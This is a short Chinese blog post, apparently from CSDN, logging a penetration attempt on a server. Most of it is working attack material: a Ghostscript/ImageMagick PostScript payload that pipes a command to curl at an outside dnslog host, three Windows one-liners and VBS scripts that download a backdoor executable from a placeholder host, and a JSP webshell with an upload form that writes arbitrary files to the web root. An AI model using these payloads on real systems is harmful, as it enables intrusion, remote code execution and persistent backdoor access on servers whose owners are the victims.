记录一次常规的渗透测试

最新推荐文章于 2022-01-26 12:55:13 发布

于小葵

最新推荐文章于 2022-01-26 12:55:13 发布

阅读量414

点赞数

分类专栏：脚本小子文章标签：安全

本文链接：https://blog.csdn.net/dlydk/article/details/106467623

版权

脚本小子专栏收录该内容

4 篇文章 0 订阅

订阅专栏

首先是魔图漏洞

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) 
currentdevice putdeviceprops

然后windows下载后门。

方法1：certutil.exe -urlcache -split -f http://xxx/x.exe

方法2：
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs

cscript downfile.vbs http://xxx/x.exe D:\\1.exe

方法3：
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://xxx/x.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.exe",2 >>download.vbs

下载失败

通过echo写入jsp webshell

记得要urlencode编码一次

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

<form method=post action="http://xxx/1.jsp">
<br><br>
<textarea name="t" rows=20 cols=120>你要提交到服务器的代码</textarea>
<br>
要保存成的文件名：<input name="f" size=30 value=shell.jsp>
<input type="submit" value=提交> 
</form>

结局很经典

纯内网没有外网权限。我傻了。

于小葵

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
记录一次常规的渗透测试

首先是魔图漏洞%!PSuserdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestoremark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops然后windows下载后门。方法1：certutil.exe -urlca
复制链接

扫一扫